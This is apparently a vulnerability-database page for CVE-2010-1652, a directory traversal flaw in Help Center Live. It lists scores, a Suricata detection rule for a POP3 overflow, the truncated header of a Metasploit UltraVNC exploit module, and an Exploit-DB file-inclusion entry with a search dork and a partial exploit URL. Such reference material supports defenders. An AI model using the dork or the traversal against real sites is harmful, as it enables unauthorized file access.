CVE-2010-1652
Published: 2010-05-03
Priority: P4 30 | medium | CVSS 2.0: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 2.86% (85.0th percentile)
Directory traversal vulnerability in the HelpCenter module in Help Center Live (HCL) 2.0.6 and 2.1.7 allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the file parameter to module.php. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| helpcenterlive | hcl | — | — |
| helpcenterlive | hcl | — | — |
Suricata
GPL POP3 APOP overflow attempt
suricata·2010-09-23
CVE-2000-0840 GPL POP3 APOP overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 110 (msg:"GPL POP3 APOP overflow attempt"; flow:established,to_server; content:"APOP"; nocase; isdataat:256,relative; pcre:"/^APOP\s[^\n]{256}/smi"; reference:bugtraq,1652; reference:cve,2000-0840; reference:cve,2000-0841; reference:nessus,10559; classtype:attempted-admin; sid:2101635; rev:15; metadata:created_at 2010_09_23, cve CVE_2000_0840, confidence Medium, signature_severity Major, updated_at 2024_03_08;)
Exploit-DB
UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-1652 UltraVNC 1.0.1 - Client Buffer Overflow (Metasploit)
---
##
# $Id: ultravnc_client.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'UltraVNC 1.0.1 Client Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in UltraVNC Win32
Viewer 1.0.1 Release.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2006-1652' ],
[ 'OSVDB', '24456' ],
[ 'BID', '17378' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars'
Exploit-DB
Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion
exploitdb·2010-04-27
CVE-2010-1652 Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion
---
# Exploit Title: Help Center Live 2.0.6(module=helpcenter&file=) Local File Inclusion
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
# Version: Web Application
# Tested on: Apache/Unix
# CVE : [if exists]
# Dork : inurl:"module=helpcenter"
# Code :
############################################################################
#Greetz to all Andhra Hackers and ICW Members[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################
[+] Exploit
http://example.com/[path]/module.php?module=
No writeups or analysis indexed.
http://packetstormsecurity.org/1004-exploits/helpcenterlive-lfi.txt
http://secunia.com/advisories/39615
http://www.exploit-db.com/exploits/12421
http://www.securityfocus.com/bid/39732
http://www.vupen.com/english/advisories/2010/1009
Published: 2010-05-03